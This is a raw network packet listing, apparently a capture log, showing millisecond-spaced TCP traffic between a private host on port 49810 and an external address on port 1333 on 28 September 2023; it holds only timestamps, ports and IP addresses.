Sep 28, 2023 06:02:00.464703083 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.464704990 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.464740992 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.464754105 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.464782000 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.464806080 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.464853048 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.464862108 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.464895964 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.464909077 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.464936972 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.464945078 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.464991093 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.464997053 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.465043068 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.465056896 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.465090990 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.465104103 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.465135098 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.465173006 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.465214014 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.465218067 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.465255976 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.465306997 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.465356112 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.465375900 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.465420961 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.465432882 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.465465069 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.465481043 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.465508938 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.465548038 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.465595007 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.465631008 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.465667963 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.465681076 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.465686083 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.465713024 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.465743065 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.465754032 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.465799093 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.465801954 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.465847969 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.465881109 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.465929031 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.465953112 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.465998888 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.466017008 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.466034889 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.466062069 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.466093063 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.466180086 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.466228962 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.466253042 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.466285944 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.466299057 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.466326952 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.466351032 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.466397047 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.466413975 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.466465950 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.466479063 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.466496944 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.466531992 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.466562986 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.466573954 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.466624022 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.466651917 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.466672897 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.466703892 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.466734886 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.466805935 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.466824055 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.466855049 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.466886044 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.466895103 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.466919899 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.466950893 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.466980934 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.467042923 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.467061996 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.467092991 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.467123985 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.467149973 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.467200041 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.467279911 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.467298031 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.467329025 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.467359066 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.467394114 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.467446089 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.467489004 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.467535973 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.467561007 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.467606068 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.467612982 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.467632055 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.467658997 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.467689991 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.467729092 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.467771053 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.467778921 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.467809916 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.467833996 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.467879057 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.467900038 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.467945099 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.467979908 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.468014002 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.468027115 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.468056917 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.468077898 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.468123913 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.468174934 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.468221903 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.468240023 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.468283892 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.468312025 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.468344927 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.468358040 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.468385935 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.468473911 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.468524933 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.468549967 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.468596935 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.468628883 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.468677044 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.468730927 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.468779087 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.468792915 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.468842030 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.468878984 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.468899965 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.468929052 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.468950033 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.468955040 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.468988895 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.469001055 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.469038010 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.469041109 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.469088078 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.469115019 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.469163895 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.469176054 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.469193935 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.469222069 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.469253063 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.469276905 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.469310045 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.469324112 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.469352007 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.469360113 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.469407082 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.469433069 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.469480991 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.469508886 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.469553947 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.469573975 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.469590902 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.469619989 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.469650984 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.469677925 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.469726086 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.469744921 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.469764948 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.469794035 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.469816923 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.469825983 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.469871998 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.469924927 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.469942093 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.469970942 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.469988108 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.469990969 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.470068932 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.470091105 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.470135927 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.470172882 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.470218897 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.470248938 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.470294952 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.470315933 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.470360994 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.470376015 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.470428944 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.470473051 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.470520973 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.470551014 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.470597982 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.470617056 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.470664024 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.470664978 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.470699072 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.470710993 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.470740080 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.470803976 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.470850945 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.470869064 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.470912933 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.470940113 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.470957994 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.470984936 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.471014977 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.471025944 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.471076012 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.471079111 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.471116066 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.471129894 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.471158028 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.471167088 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.471211910 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.471247911 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.471293926 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.471347094 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.471388102 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.471393108 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.471426010 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.471443892 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.471489906 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.471497059 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.471530914 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.471544027 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.471571922 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.471596003 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.471642017 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.471668005 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.471719027 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.471751928 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.471801043 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.471833944 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.471851110 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.471879959 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.471899986 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.471906900 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.471951962 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.471956968 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.472007036 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.472043991 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.472090006 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.472106934 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.472151995 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.472188950 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.472234964 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.472271919 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.472316980 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.472353935 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.472388029 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.472400904 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.472407103 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.472430944 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.472460032 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.472496986 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.472539902 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.472543001 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.472588062 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.472625971 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.472692966 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.472729921 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.472795963 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.472807884 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.472848892 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.472860098 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.472891092 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.472927094 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.472975969 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.472975969 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.473014116 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.473026991 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.473058939 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.473063946 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.473109007 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.473114014 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.473160982 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.473177910 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.473222971 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.473311901 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.473364115 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.473383904 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.473428965 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.473449945 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.473470926 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.473501921 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.473532915 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.473543882 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.473591089 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.473592043 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.473628998 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.473640919 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.473670006 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.473678112 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.473723888 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.473757029 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.473803043 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.473838091 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.473856926 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.473885059 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.473916054 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.473942995 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.473990917 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.474026918 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.474076033 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.474082947 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.474133015 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.474169970 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.474215984 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.474225044 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.474270105 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.474281073 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.474313974 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.474328041 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.474358082 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.474378109 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.474416018 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.474442959 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.474478006 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.474483013 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.474518061 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.474533081 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.474570036 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.474570990 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.474617004 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.474654913 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.474704981 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.474718094 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.474764109 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.474788904 CEST	1333	49810	116.202.2.169	192.168.2.3
